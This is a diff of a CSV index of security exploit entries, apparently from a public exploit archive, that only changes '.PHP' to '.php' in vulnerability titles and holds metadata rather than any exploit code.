Rand",windows,remote,0 @@ -19400,9 +19400,9 @@ id,file,description,date,author,platform,type,port 22143,platforms/linux/remote/22143.txt,"BRS WebWeaver 1.0 1 MKDir Directory Traversal Weakness",2003-01-10,euronymous,linux,remote,0 22144,platforms/windows/remote/22144.txt,"Xynph FTP Server 1.0 Relative Path Directory Traversal Vulnerability",2003-01-11,"Zero-X www.lobnan.de Team",windows,remote,0 22145,platforms/multiple/remote/22145.txt,"BitMover BitKeeper 3.0 Daemon Mode Remote Command Execution Vulnerability",2003-01-11,"Maurycy Prodeus ",multiple,remote,0 -22146,platforms/php/webapps/22146.txt,"YABB 1.4.1 SE Reminder.PHP SQL Injection Vulnerability",2003-01-12,"VOID.AT Security",php,webapps,0 +22146,platforms/php/webapps/22146.txt,"YABB 1.4.1 SE Reminder.php SQL Injection Vulnerability",2003-01-12,"VOID.AT Security",php,webapps,0 22147,platforms/linux/remote/22147.c,"mpg123 pre0.59s Invalid MP3 Header Memory Corruption Vulnerability",2003-01-13,"Gobbles Security",linux,remote,0 -22148,platforms/php/webapps/22148.txt,"phpPass 2 AccessControl.PHP SQL Injection Vulnerability",2003-01-13,frog,php,webapps,0 +22148,platforms/php/webapps/22148.txt,"phpPass 2 AccessControl.php SQL Injection Vulnerability",2003-01-13,frog,php,webapps,0 22149,platforms/php/webapps/22149.txt,"W-Agora 4.1.6 index.php bn Parameter Traversal Arbitrary File Access",2003-01-13,sonyy,php,webapps,0 22150,platforms/php/webapps/22150.txt,"W-Agora 4.1.6 modules.php file Parameter Traversal Arbitrary File Access",2003-01-13,sonyy,php,webapps,0 22155,platforms/windows/dos/22155.pl,"Adobe Reader 10.1.4 Crash PoC",2012-10-22,coolkaveh,windows,dos,0 @@ -19417,7 +19417,7 @@ id,file,description,date,author,platform,type,port 22160,platforms/php/webapps/22160.txt,"atutor 1.2 - Multiple Vulnerabilities",2012-10-22,"High-Tech Bridge SA",php,webapps,0 22161,platforms/windows/remote/22161.rb,"Turbo FTP Server 1.30.823 PORT Overflow",2012-10-23,metasploit,windows,remote,21 22162,platforms/windows/dos/22162.txt,"Symantec Norton Internet Security 2003 ICMP Packet Flood DoS",2003-01-13,"Pavel P",windows,dos,0 -22163,platforms/php/webapps/22163.txt,"Geeklog 1.3.7 Profiles.PHP Multiple Cross-Site Scripting Vulnerabilities",2003-01-14,snooq,php,webapps,0 +22163,platforms/php/webapps/22163.txt,"Geeklog 1.3.7 Profiles.php Multiple Cross-Site Scripting Vulnerabilities",2003-01-14,snooq,php,webapps,0 22164,platforms/php/webapps/22164.txt,"Geeklog 1.3.7 users.php uid Parameter XSS",2003-01-14,snooq,php,webapps,0 22165,platforms/php/webapps/22165.txt,"Geeklog 1.3.7 comment.php cid Parameter XSS",2003-01-14,snooq,php,webapps,0 22166,platforms/php/webapps/22166.txt,"Geeklog 1.3.7 Homepage User Field HTML Injection Vulnerability",2003-01-14,snooq,php,webapps,0 @@ -19446,7 +19446,7 @@ id,file,description,date,author,platform,type,port 22189,platforms/linux/local/22189.txt,"MTink 0.9.x Printer Status Monitor Environment Variable Buffer Overflow Vulnerability",2003-01-21,"Karol Wiesek",linux,local,0 22190,platforms/linux/local/22190.txt,"ESCPUtil 1.15.2 2 - Local Printer Name Buffer Overflow Vulnerability",2003-01-21,"Karol Wiesek",linux,local,0 22191,platforms/linux/dos/22191.pl,"Apache Web Server 2.0.x - MS-DOS Device Name Denial of Service Vulnerability",2003-01-22,"Matthew Murphy",linux,dos,0 -22192,platforms/php/webapps/22192.pl,"YABB SE 0.8/1.4/1.5 Packages.PHP Remote File Include Vulnerability",2003-01-22,spabam,php,webapps,0 +22192,platforms/php/webapps/22192.pl,"YABB SE 0.8/1.4/1.5 Packages.php Remote File Include Vulnerability",2003-01-22,spabam,php,webapps,0 22193,platforms/windows/local/22193.txt,"WinRAR 2.90/3.0/3.10 Archive File Extension Buffer Overrun Vulnerability",2003-01-22,nesumin,windows,local,0 22194,platforms/windows/remote/22194.txt,"Microsoft Windows XP/2000/NT 4 Locator Service Buffer Overflow Vulnerability",2003-01-22,"David Litchfield",windows,remote,0 22195,platforms/php/webapps/22195.txt,"PHPOutsourcing Zorum 3.x - Remote Include Command Execution Vulnerability",2003-01-22,MGhz,php,webapps,0 @@ -19505,8 +19505,8 @@ id,file,description,date,author,platform,type,port 22250,platforms/multiple/dos/22250.sh,"iParty Conferencing Server Denial of Service Vulnerability",1999-05-08,wh00t,multiple,dos,0 22251,platforms/multiple/remote/22251.sh,"AIX 3.x/4.x & Windows 95/98/2000/NT 4 & SunOS 5 gethostbyname() - Buffer Overflow",2006-09-28,RoMaNSoFt,multiple,remote,0 22252,platforms/php/webapps/22252.txt,"PHP-Board 1.0 User Password Disclosure Vulnerability",2003-02-15,frog,php,webapps,0 -22253,platforms/php/webapps/22253.txt,"DotBr 0.1 System.PHP3 - Remote Command Execution Vulnerability",2003-02-15,frog,php,webapps,0 -22254,platforms/php/webapps/22254.txt,"DotBr 0.1 Exec.PHP3 - Remote Command Execution Vulnerability",2003-02-15,frog,php,webapps,0 +22253,platforms/php/webapps/22253.txt,"DotBr 0.1 System.php3 - Remote Command Execution Vulnerability",2003-02-15,frog,php,webapps,0 +22254,platforms/php/webapps/22254.txt,"DotBr 0.1 Exec.php3 - Remote Command Execution Vulnerability",2003-02-15,frog,php,webapps,0 22255,platforms/windows/dos/22255.txt,"Microsoft Windows XP/95/98/2000/NT 4 Riched20.dll Attribute Buffer Overflow Vulnerability",2003-02-17,"Jie Dong",windows,dos,0 22256,platforms/php/webapps/22256.txt,"D-Forum 1 header Parameter Remote File Inclusion",2003-02-18,frog,php,webapps,0 22257,platforms/php/webapps/22257.txt,"D-Forum 1 footer Parameter Remote File Inclusion",2003-02-18,frog,php,webapps,0 @@ -19519,7 +19519,7 @@ id,file,description,date,author,platform,type,port 22264,platforms/linux/remote/22264.txt,"OpenSSL 0.9.x CBC Error Information Leakage Weakness",2003-02-19,"Martin Vuagnoux",linux,remote,0 22265,platforms/linux/local/22265.pl,"cPanel 5.0 - Openwebmail Local Privilege Escalation Vulnerability",2003-02-19,deadbeat,linux,local,0 22266,platforms/php/webapps/22266.php,"PHP-Nuke 5.6/6.0 - Search Engine SQL Injection Vulnerability",2003-02-19,"David Zentner",php,webapps,0 -22267,platforms/php/webapps/22267.php,"PHPBB2 Page_Header.PHP SQL Injection Vulnerability",2003-02-19,"David Zentner",php,webapps,0 +22267,platforms/php/webapps/22267.php,"PHPBB2 Page_Header.php SQL Injection Vulnerability",2003-02-19,"David Zentner",php,webapps,0 22268,platforms/php/webapps/22268.txt,"myPHPNuke 1.8.8 Links.php Cross-Site Scripting Vulnerability",2003-02-20,"Tacettin Karadeniz",php,webapps,0 22269,platforms/windows/remote/22269.txt,"Sage 1.0 beta 3 Content Management System Path Disclosure Vulnerability",2003-02-20,euronymous,windows,remote,0 22270,platforms/windows/remote/22270.txt,"Sage 1.0 beta 3 Content Management System Cross-Site Scripting Vulnerability",2003-02-20,euronymous,windows,remote,0 @@ -19548,8 +19548,8 @@ id,file,description,date,author,platform,type,port 22294,platforms/linux/dos/22294.c,"TCPDump 3.x Malformed ISAKMP Packet Denial of Service Vulnerability",2003-03-01,"The Salvia Twist",linux,dos,0 22295,platforms/php/webapps/22295.txt,"Invision Board 1.1.1 ipchat.php Remote File Include Vulnerability",2003-02-27,frog,php,webapps,0 22296,platforms/multiple/remote/22296.txt,"Axis Communications HTTP Server 2.x Messages Information Disclosure Vulnerability",2003-02-28,"Martin Eiszner",multiple,remote,0 -22297,platforms/php/webapps/22297.pl,"Typo3 3.5 b5 Showpic.PHP File Enumeration Vulnerability",2003-02-28,"Martin Eiszner",php,webapps,0 -22298,platforms/php/webapps/22298.txt,"Typo3 3.5 b5 Translations.PHP Remote File Include Vulnerability",2003-02-28,"Martin Eiszner",php,webapps,0 +22297,platforms/php/webapps/22297.pl,"Typo3 3.5 b5 Showpic.php File Enumeration Vulnerability",2003-02-28,"Martin Eiszner",php,webapps,0 +22298,platforms/php/webapps/22298.txt,"Typo3 3.5 b5 Translations.php Remote File Include Vulnerability",2003-02-28,"Martin Eiszner",php,webapps,0 22300,platforms/php/webapps/22300.txt,"WordPress Easy Webinar Plugin - Blind SQL Injection Vulnerability",2012-10-28,"Robert Cooper",php,webapps,0 22301,platforms/windows/remote/22301.html,"Aladdin Knowledge System Ltd - PrivAgent.ocx ChooseFilePath BOF",2012-10-28,b33f,windows,remote,0 22302,platforms/windows/dos/22302.rb,"hMailServer 5.3.3 IMAP Remote Crash PoC",2012-10-28,"John Smith",windows,dos,0 @@ -19570,7 +19570,7 @@ id,file,description,date,author,platform,type,port 22315,platforms/php/webapps/22315.pl,"Typo3 3.5 b5 HTML Hidden Form Field Information Disclosure Weakness (1)",2003-02-28,"Martin Eiszner",php,webapps,0 22316,platforms/php/webapps/22316.pl,"Typo3 3.5 b5 HTML Hidden Form Field Information Disclosure Weakness (2)",2003-02-28,"Martin Eiszner",php,webapps,0 22317,platforms/php/webapps/22317.txt,"GTCatalog 0.8.16/0.9 - Remote File Include Vulnerability",2003-03-03,frog,php,webapps,0 -22318,platforms/php/webapps/22318.txt,"Webchat 0.77 Defines.PHP Remote File Include Vulnerability",2003-03-03,frog,php,webapps,0 +22318,platforms/php/webapps/22318.txt,"Webchat 0.77 Defines.php Remote File Include Vulnerability",2003-03-03,frog,php,webapps,0 22319,platforms/hardware/remote/22319.txt,"HP JetDirect Printer SNMP JetAdmin Device Password Disclosure Vulnerability",2003-03-03,"Sven Pechler",hardware,remote,0 22320,platforms/linux/local/22320.c,"XFree86 4.2 XLOCALEDIR Local Buffer Overflow Vulnerability (1)",2003-03-03,"dcryptr && tarranta",linux,local,0 22321,platforms/linux/local/22321.c,"XFree86 4.2 XLOCALEDIR Local Buffer Overflow Vulnerability (2)",2003-03-03,"Guilecool & deka",linux,local,0 @@ -19640,7 +19640,7 @@ id,file,description,date,author,platform,type,port 22390,platforms/windows/dos/22390.c,"Microsoft ActiveSync 3.5 Null Pointer Dereference Denial of Service Vulnerability",2003-03-20,"Andy Davis",windows,dos,0 22391,platforms/php/webapps/22391.txt,"OSCommerce 2.1/2.2 Error_Message Cross-Site Scripting Vulnerability",2003-03-20,"iProyectos group",php,webapps,0 22392,platforms/php/webapps/22392.txt,"OSCommerce 2.1/2.2 Info_Message Cross-Site Scripting Vulnerability",2003-03-20,"iProyectos group",php,webapps,0 -22393,platforms/php/webapps/22393.txt,"OSCommerce 2.1/2.2 Checkout_Payment.PHP Error Output Cross-Site Scripting Vulnerability",2003-03-20,"iProyectos group",php,webapps,0 +22393,platforms/php/webapps/22393.txt,"OSCommerce 2.1/2.2 Checkout_Payment.php Error Output Cross-Site Scripting Vulnerability",2003-03-20,"iProyectos group",php,webapps,0 22394,platforms/hardware/remote/22394.txt,"Check Point FW-1 Syslog Daemon Unfiltered Escape Sequence Vulnerability",2003-03-21,"Dr. Peter Bieringer",hardware,remote,0 22395,platforms/windows/dos/22395.txt,"eDonkey Clients 0.44/0.45 - Multiple Chat Dialog Resource Consumption Vulnerability",2003-03-21,"Auriemma Luigi",windows,dos,0 22396,platforms/php/webapps/22396.txt,"WordPress bbpress Plugin - Multiple Vulnerabilities",2012-11-01,Dark-Puzzle,php,webapps,0 @@ -19656,10 +19656,10 @@ id,file,description,date,author,platform,type,port 22408,platforms/cgi/webapps/22408.txt,"Planetmoon Guestbook Clear Text Password Retrieval Vulnerability",2003-03-21,subj,cgi,webapps,0 22409,platforms/multiple/remote/22409.txt,"Simple Chat 1.x User Information Disclosure Vulnerability",2003-03-21,subj,multiple,remote,0 22410,platforms/multiple/remote/22410.pl,"ProtWare HTML Guardian 6.x Encryption Weakness",2003-03-21,rain_song,multiple,remote,0 -22411,platforms/php/webapps/22411.txt,"PHP-Nuke 5.6/6.x Banners.PHP Banner Manager - Password Disclosure Vulnerability",2003-03-22,frog,php,webapps,0 +22411,platforms/php/webapps/22411.txt,"PHP-Nuke 5.6/6.x Banners.php Banner Manager - Password Disclosure Vulnerability",2003-03-22,frog,php,webapps,0 22412,platforms/php/webapps/22412.txt,"Advanced Poll 2.0 - Remote Information Disclosure Vulnerability",2003-03-22,subj,php,webapps,0 -22413,platforms/php/webapps/22413.txt,"PHP-Nuke 5.6/6.x News Module - Article.PHP SQL Injection Vulnerability",2003-03-22,frog,php,webapps,0 -22414,platforms/php/webapps/22414.php,"PHP-Nuke 5.6/6.x News Module - Index.PHP SQL Injection Vulnerability",2003-03-23,frog,php,webapps,0 +22413,platforms/php/webapps/22413.txt,"PHP-Nuke 5.6/6.x News Module - Article.php SQL Injection Vulnerability",2003-03-22,frog,php,webapps,0 +22414,platforms/php/webapps/22414.php,"PHP-Nuke 5.6/6.x News Module - Index.php SQL Injection Vulnerability",2003-03-23,frog,php,webapps,0 22415,platforms/hardware/dos/22415.c,"3Com SuperStack II RAS 1500 - IP Header Denial of Service Vulnerability",2003-03-24,"Piotr Chytla",hardware,dos,0 22416,platforms/hardware/remote/22416.txt,"3Com SuperStack II RAS 1500 Unauthorized Access Vulnerability",2003-03-24,"Piotr Chytla",hardware,remote,0 22417,platforms/windows/dos/22417.py,"Kerio Personal Firewall 2.1.x - Remote Authentication Packet Buffer Overflow Vulnerability (1)",2003-04-28,"Core Security",windows,dos,0 @@ -19667,13 +19667,13 @@ id,file,description,date,author,platform,type,port 22419,platforms/php/dos/22419.php,"PHP 4.3 socket_iovec_alloc() Integer Overflow Vulnerability",2003-03-25,"Sir Mordred",php,dos,0 22420,platforms/windows/dos/22420.txt,"Emule 0.27 b Empty Nickname Chat Request Denial of Service Vulnerability",2003-03-25,"Auriemma Luigi",windows,dos,0 22421,platforms/php/webapps/22421.txt,"Web Chat Manager 2.0 HTML Code Injection Vulnerability",2003-03-25,Over_G,php,webapps,0 -22422,platforms/php/webapps/22422.txt,"PHP-Nuke 6.5 Addon Viewpage.PHP File Disclosure Vulnerability",2003-03-25,"Zero-X www.lobnan.de Team",php,webapps,0 +22422,platforms/php/webapps/22422.txt,"PHP-Nuke 6.5 Addon Viewpage.php File Disclosure Vulnerability",2003-03-25,"Zero-X www.lobnan.de Team",php,webapps,0 22423,platforms/php/webapps/22423.txt,"PHP-Nuke 6.0/6.5 Forum Module - Viewtopic.php SQL Injection Vulnerability",2003-03-25,frog,php,webapps,0 -22424,platforms/php/webapps/22424.txt,"PHP-Nuke 6.0/6.5 Forum Module - Viewforum.PHP SQL Injection Vulnerability",2003-03-25,frog,php,webapps,0 +22424,platforms/php/webapps/22424.txt,"PHP-Nuke 6.0/6.5 Forum Module - Viewforum.php SQL Injection Vulnerability",2003-03-25,frog,php,webapps,0 22425,platforms/php/dos/22425.php,"PHP 4.x socket_recv() Signed Integer Memory Corruption Vulnerability",2003-03-26,"Sir Mordred",php,dos,0 22426,platforms/php/dos/22426.php,"PHP 4.x socket_recvfrom() Signed Integer Memory Corruption Vulnerability",2003-03-26,"Sir Mordred",php,dos,0 22427,platforms/php/webapps/22427.txt,"WordPress All Video Gallery 1.1 - SQL Injection Vulnerability",2012-11-02,"Ashiyane Digital Security Team",php,webapps,0 -22521,platforms/php/webapps/22521.c,"XMB Forum 1.8 Member.PHP SQL Injection Vulnerability",2003-04-22,zeez@bbugs.org,php,webapps,0 +22521,platforms/php/webapps/22521.c,"XMB Forum 1.8 Member.php SQL Injection Vulnerability",2003-04-22,zeez@bbugs.org,php,webapps,0 22429,platforms/php/webapps/22429.txt,"vBulletin ChangUonDyU Advanced Statistics - SQL Injection Vulnerability",2012-11-02,Juno_okyo,php,webapps,0 22430,platforms/php/webapps/22430.txt,"PrestaShop <= 1.5.1 Persistent XSS",2012-11-02,"David Sopas",php,webapps,0 22431,platforms/php/webapps/22431.txt,"achievo 1.4.5 - Multiple Vulnerabilities",2012-11-02,"Canberk BOLAT",php,webapps,0 @@ -19702,9 +19702,9 @@ id,file,description,date,author,platform,type,port 22454,platforms/linux/remote/22454.c,"AutomatedShops WebC 2.0/5.0 Script Name Remote Buffer Overrun Vulnerability",2003-02-16,"Carl Livitt",linux,remote,0 22455,platforms/hardware/remote/22455.txt,"Netgear FM114P ProSafe Wireless Router Rule Bypass Vulnerability",2003-04-03,stickler,hardware,remote,0 22456,platforms/linux/local/22456.txt,"AutomatedShops WebC 2.0/5.0 Symbolic Link Following Configuration File Weakness",2003-04-03,"Carl Livitt",linux,local,0 -22457,platforms/php/webapps/22457.txt,"PHPSysInfo 2.0/2.1 Index.PHP File Disclosure Vulnerability",2003-04-03,"Albert Puigsech Galicia",php,webapps,0 +22457,platforms/php/webapps/22457.txt,"PHPSysInfo 2.0/2.1 Index.php File Disclosure Vulnerability",2003-04-03,"Albert Puigsech Galicia",php,webapps,0 22458,platforms/linux/local/22458.c,"Linux Kernel 2.2.x / 2.4.x - I/O System Call File Existence Weakness",2003-04-04,"Andrew Griffiths",linux,local,0 -22459,platforms/php/webapps/22459.txt,"PHPSysInfo 2.0/2.1 Index.PHP LNG File Disclosure Vulnerability",2003-04-04,"Albert Puigsech Galicia",php,webapps,0 +22459,platforms/php/webapps/22459.txt,"PHPSysInfo 2.0/2.1 Index.php LNG File Disclosure Vulnerability",2003-04-04,"Albert Puigsech Galicia",php,webapps,0 22460,platforms/windows/dos/22460.txt,"Abyss Web Server 1.1.2 Incomplete HTTP Request Denial of Service Vulnerability",2003-04-05,"Auriemma Luigi",windows,dos,0 22461,platforms/php/webapps/22461.txt,"Invision Board 1.1.1 functions.php SQL Injection Vulnerability",2003-04-05,"Gossi The Dog",php,webapps,0 22462,platforms/multiple/remote/22462.txt,"Interbase 6.x External Table File Verification Vulnerability",2003-04-05,"Kotala Zdenek",multiple,remote,0 @@ -19740,7 +19740,7 @@ id,file,description,date,author,platform,type,port 22501,platforms/php/webapps/22501.txt,"Xonic.ru News 1.0 script.php Remote Command Execution Vulnerability",2003-03-31,"DWC Gr0up",php,webapps,0 22492,platforms/php/webapps/22492.txt,"EZ Publish 2.2.7/3.0 - Multiple Path Disclosure Vulnerabilities",2003-04-15,"gregory Le Bras",php,webapps,0 22493,platforms/hardware/webapps/22493.txt,"CheckPoint/Sofaware Firewall - Multiple Vulnerabilities",2012-11-05,Procheckup,hardware,webapps,0 -22494,platforms/php/dos/22494.txt,"OSCommerce 2.2 - Product_Info.PHP Denial of Service Vulnerability",2003-04-15,"Lorenzo Hernandez Garcia-Hierro",php,dos,0 +22494,platforms/php/dos/22494.txt,"OSCommerce 2.2 - Product_Info.php Denial of Service Vulnerability",2003-04-15,"Lorenzo Hernandez Garcia-Hierro",php,dos,0 22496,platforms/multiple/remote/22496.txt,"Python 2.2/2.3 Documentation Server Error Page Cross-Site Scripting Vulnerability",2003-04-15,euronymous,multiple,remote,0 22497,platforms/multiple/remote/22497.txt,"12Planet Chat Server 2.5 Error Message Installation Path Disclosure Vulnerability",2003-04-11,"Dennis Rand",multiple,remote,0 22498,platforms/php/webapps/22498.txt,"OSCommerce 2.2 - Authentication Bypass Vulnerability",2003-04-15,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 @@ -19760,10 +19760,10 @@ id,file,description,date,author,platform,type,port 22514,platforms/multiple/dos/22514.txt,"Mod_NTLM 0.x - Authorization Format String Vulnerability",2003-04-21,"Matthew Murphy",multiple,dos,0 22515,platforms/windows/remote/22515.txt,"AN HTTPD 1.x Count.pl Directory Traversal Vulnerability",2003-04-22,"Matthew Murphy",windows,remote,0 22516,platforms/windows/dos/22516.pl,"Xeneo Web Server 2.2.9 - Denial of Service Vulnerability",2003-04-21,badpack3t,windows,dos,0 -22517,platforms/php/webapps/22517.txt,"OpenBB 1.0/1.1 Index.PHP Remote SQL Injection Vulnerability",2003-04-22,"Albert Puigsech Galicia",php,webapps,0 +22517,platforms/php/webapps/22517.txt,"OpenBB 1.0/1.1 Index.php Remote SQL Injection Vulnerability",2003-04-22,"Albert Puigsech Galicia",php,webapps,0 22518,platforms/windows/dos/22518.html,"Microsoft Shlwapi.dll 6.0.2800.1106 Malformed HTML Form Tag DoS Vulnerability",2003-04-22,"Ramon Pinuaga Cascales",windows,dos,0 -22519,platforms/php/webapps/22519.txt,"OpenBB 1.0/1.1 Board.PHP Remote SQL Injection Vulnerability",2003-04-22,"Albert Puigsech Galicia",php,webapps,0 -22520,platforms/php/webapps/22520.txt,"OpenBB 1.0/1.1 Member.PHP Remote SQL Injection Vulnerability",2003-04-22,"Albert Puigsech Galicia",php,webapps,0 +22519,platforms/php/webapps/22519.txt,"OpenBB 1.0/1.1 Board.php Remote SQL Injection Vulnerability",2003-04-22,"Albert Puigsech Galicia",php,webapps,0 +22520,platforms/php/webapps/22520.txt,"OpenBB 1.0/1.1 Member.php Remote SQL Injection Vulnerability",2003-04-22,"Albert Puigsech Galicia",php,webapps,0 22522,platforms/multiple/remote/22522.pl,"Web Protector 2.0 Trivial Encryption Weakness",2003-04-22,rjfix,multiple,remote,0 22570,platforms/windows/remote/22570.java,"Microsoft Windows Media Player 7.1 Skin File Code Execution Vulnerability",2003-05-07,"Jelmer Kuperus",windows,remote,0 22571,platforms/cgi/webapps/22571.pl,"HappyMall E-Commerce Software 4.3/4.4 Normal_HTML.CGI Command Execution Vulnerability",2003-05-07,"Revin Aldi",cgi,webapps,0 @@ -19836,7 +19836,7 @@ id,file,description,date,author,platform,type,port 22592,platforms/cgi/webapps/22592.txt,"Happymall E-Commerce Software 4.3/4.4 Normal_HTML.CGI File Disclosure Vulnerability",2003-05-12,"Julio Cesar",cgi,webapps,0 22593,platforms/windows/remote/22593.html,"Yahoo! Voice Chat ActiveX Control 1.0.0.43 - Buffer Overflow Vulnerability",2003-05-12,cesaro,windows,remote,0 22594,platforms/linux/local/22594.c,"CDRTools CDRecord 1.11/2.0 Devname Format String Vulnerability",2003-05-13,CMN,linux,local,0 -22595,platforms/php/webapps/22595.txt,"PHP-Nuke 6.5 Modules.PHP Username URI Parameter Cross-Site Scripting Vulnerability",2003-05-13,"Ferruh Mavituna",php,webapps,0 +22595,platforms/php/webapps/22595.txt,"PHP-Nuke 6.5 Modules.php Username URI Parameter Cross-Site Scripting Vulnerability",2003-05-13,"Ferruh Mavituna",php,webapps,0 22596,platforms/hardware/dos/22596.txt,"Verilink NetEngine 6100-4 Broadband Router - TFTP Packet Remote Denial of Service Vulnerability",2003-05-08,"Lorenzo Cerulli and Fabio Annunziato",hardware,dos,0 22597,platforms/php/webapps/22597.txt,"PHP-Nuke 6.5 - Multiple Downloads Module SQL Injection Vulnerabilities",2003-05-13,"Albert Puigsech Galicia",php,webapps,0 22598,platforms/php/webapps/22598.txt,"PHP-Nuke 6.0/6.5 Web_Links Module Path Disclosure Vulnerability",2003-05-13,"Rynho Zeros Web",php,webapps,0 @@ -19844,36 +19844,36 @@ id,file,description,date,author,platform,type,port 22600,platforms/php/webapps/22600.txt,"Owl Intranet Engine 0.7 - Authentication Bypass Vulnerability",2003-05-14,cdowns,php,webapps,0 22601,platforms/linux/remote/22601.txt,"Inktomi Traffic Server 4.0/5.x - Cross-Site Scripting Vulnerability",2003-05-14,"Hugo Vazquez",linux,remote,0 22602,platforms/palm_os/dos/22602.c,"PalmOS 3/4 ICMP Flood Remote Denial of Service Vulnerability",2003-05-14,"Shaun Colley",palm_os,dos,0 -22603,platforms/php/webapps/22603.txt,"PHP-Proxima autohtml.PHP Information Disclosure Vulnerability",2003-05-14,"Mind Warper",php,webapps,0 +22603,platforms/php/webapps/22603.txt,"PHP-Proxima autohtml.php Information Disclosure Vulnerability",2003-05-14,"Mind Warper",php,webapps,0 22604,platforms/windows/remote/22604.txt,"ArGoSoft 1.8.x - Authentication Bypass Vulnerability",2003-05-15,"Ziv Kamir",windows,remote,0 -22605,platforms/php/webapps/22605.txt,"OneOrZero Helpdesk 1.4 TUpdate.PHP SQL Injection Vulnerability",2003-05-15,frog,php,webapps,0 -22606,platforms/php/webapps/22606.py,"OneOrZero Helpdesk 1.4 Install.PHP Administrative Access Vulnerability",2003-05-15,frog,php,webapps,0 -22607,platforms/php/webapps/22607.txt,"EZ Publish 2.2 Index.PHP IMG Tag Cross-Site Scripting Vulnerability",2003-05-16,"Ferruh Mavituna",php,webapps,0 +22605,platforms/php/webapps/22605.txt,"OneOrZero Helpdesk 1.4 TUpdate.php SQL Injection Vulnerability",2003-05-15,frog,php,webapps,0 +22606,platforms/php/webapps/22606.py,"OneOrZero Helpdesk 1.4 Install.php Administrative Access Vulnerability",2003-05-15,frog,php,webapps,0 +22607,platforms/php/webapps/22607.txt,"EZ Publish 2.2 Index.php IMG Tag Cross-Site Scripting Vulnerability",2003-05-16,"Ferruh Mavituna",php,webapps,0 22608,platforms/windows/dos/22608.txt,"Snowblind Web Server 1.0/1.1 Malformed HTTP Request Denial of Service Vulnerability",2003-05-16,euronymous,windows,dos,0 22609,platforms/windows/remote/22609.txt,"Snowblind 1.0/1.1 Web Server File Disclosure Vulnerability",2003-05-16,euronymous,windows,remote,0 22610,platforms/windows/dos/22610.txt,"Snowblind Web Server 1.0/1.1 HTTP GET Request Buffer Overflow Vulnerability",2003-05-16,euronymous,windows,dos,0 22611,platforms/multiple/remote/22611.txt,"Netscape Enterprise Server 3.x/4.x PageServices Information Disclosure Vulnerability",1998-08-16,anonymous,multiple,remote,0 -22612,platforms/php/webapps/22612.txt,"ttCMS 2.2/2.3 Header.PHP Remote File Include Vulnerability",2003-05-17,ScriptSlave@gmx.net,php,webapps,0 +22612,platforms/php/webapps/22612.txt,"ttCMS 2.2/2.3 Header.php Remote File Include Vulnerability",2003-05-17,ScriptSlave@gmx.net,php,webapps,0 22613,platforms/freebsd/local/22613.pl,"Maelstrom Server 3.0.x Argument Buffer Overflow Vulnerability (1)",2003-05-20,"Luca Ercoli",freebsd,local,0 22614,platforms/freebsd/local/22614.c,"Maelstrom Server 3.0.x Argument Buffer Overflow Vulnerability (2)",2003-05-23,ph4nt0m,freebsd,local,0 22615,platforms/freebsd/local/22615.c,"Maelstrom Server 3.0.x Argument Buffer Overflow Vulnerability (3)",2003-05-20,CMN,freebsd,local,0 22616,platforms/linux/local/22616.pl,"Maelstrom Player 3.0.x Argument Buffer Overflow Vulnerability (1)",2003-05-21,"Luca Ercoli",linux,local,0 22617,platforms/linux/local/22617.c,"Maelstrom Player 3.0.x Argument Buffer Overflow Vulnerability (2)",2003-05-20,knight420,linux,local,0 -22618,platforms/php/webapps/22618.txt,"ttCMS 2.2/2.3_ttForum 1.1 Index.PHP Instant-Messages Preferences SQL Injection Vulnerability",2003-05-20,ScriptSlave@gmx.net,php,webapps,0 +22618,platforms/php/webapps/22618.txt,"ttCMS 2.2/2.3_ttForum 1.1 Index.php Instant-Messages Preferences SQL Injection Vulnerability",2003-05-20,ScriptSlave@gmx.net,php,webapps,0 22619,platforms/linux/dos/22619.txt,"CUPS 1.1.x Cupsd Request Method Denial of Service Vulnerability",2003-05-20,"Phil D'Amore",linux,dos,0 22620,platforms/windows/remote/22620.txt,"Working Resources BadBlue 1.7.x/2.x - Unauthorized HTS Access Vulnerability",2003-05-20,mattmurphy,windows,remote,0 22621,platforms/windows/dos/22621.txt,"Microsoft Netmeeting 2.1/3.0.1 4.4.3385 CALLTO URL Buffer Overflow Vulnerability",2003-05-20,"David F. Madrid",windows,dos,0 22622,platforms/linux/remote/22622.txt,"WSMP3 0.0.x - Remote Information Disclosure Vulnerability",2003-05-21,"dong-h0un U",linux,remote,0 22623,platforms/linux/remote/22623.txt,"WSMP3 0.0.x - Remote Command Execution Vulnerability",2003-05-21,"dong-h0un U",linux,remote,0 22624,platforms/linux/dos/22624.c,"BZFlag 1.7 g0 Reconnect Denial of Service Vulnerability",2003-05-21,"russian code molester",linux,dos,0 -22625,platforms/php/webapps/22625.txt,"SudBox Boutique 1.2 login.PHP Authentication Bypass Vulnerability",2003-05-21,frog,php,webapps,0 +22625,platforms/php/webapps/22625.txt,"SudBox Boutique 1.2 login.php Authentication Bypass Vulnerability",2003-05-21,frog,php,webapps,0 22626,platforms/hardware/remote/22626.txt,"Axis Network Camera 2.x HTTP Authentication Bypass Vulnerability",2003-05-27,"Juliano Rizzo",hardware,remote,0 22627,platforms/windows/remote/22627.pl,"Qualcomm Eudora 5.2.1/6.0 File Attachment Spoofing Variant Vulnerability",2003-05-22,"Paul Szabo",windows,remote,0 22628,platforms/multiple/local/22628.sh,"Platform Load Sharing Facility 4/5 LSF_ENVDIR Local Command Execution Vulnerability",2003-03-20,"Tomasz Grabowski",multiple,local,0 22629,platforms/osx/dos/22629.txt,"Apple QuickTime/Darwin Streaming Server 4.1.3 QTSSReflector Module Integer Overflow Vulnerability",2003-05-22,"Sir Mordred",osx,dos,0 22630,platforms/osx/remote/22630.txt,"Apple QuickTime/Darwin Streaming MP3Broadcaster - ID3 Tag Handling Vulnerability",2003-05-22,"Sir Mordred",osx,remote,0 22631,platforms/windows/remote/22631.txt,"IISProtect 2.1/2.2 - Authentication Bypass Vulnerability",2003-05-22,iDefense,windows,remote,0 -22632,platforms/php/webapps/22632.txt,"XMB Forum 1.8 Member.PHP Cross-Site Scripting Vulnerability",2003-06-22,"Marc Ruef",php,webapps,0 +22632,platforms/php/webapps/22632.txt,"XMB Forum 1.8 Member.php Cross-Site Scripting Vulnerability",2003-06-22,"Marc Ruef",php,webapps,0 22633,platforms/linux/local/22633.c,"Polymorph 0.4 Filename Buffer Overflow Vulnerability",2003-05-22,demz,linux,local,0 22634,platforms/multiple/dos/22634.txt,"Nessus 2.0.x LibNASL Arbitrary Code Execution Vulnerability",2003-05-22,"Sir Mordred",multiple,dos,0 22635,platforms/windows/remote/22635.c,"Magic Winmail Server 2.3 USER POP3 Command Format String Vulnerability",2003-05-23,D4rkGr3y,windows,remote,0 @@ -19883,7 +19883,7 @@ id,file,description,date,author,platform,type,port 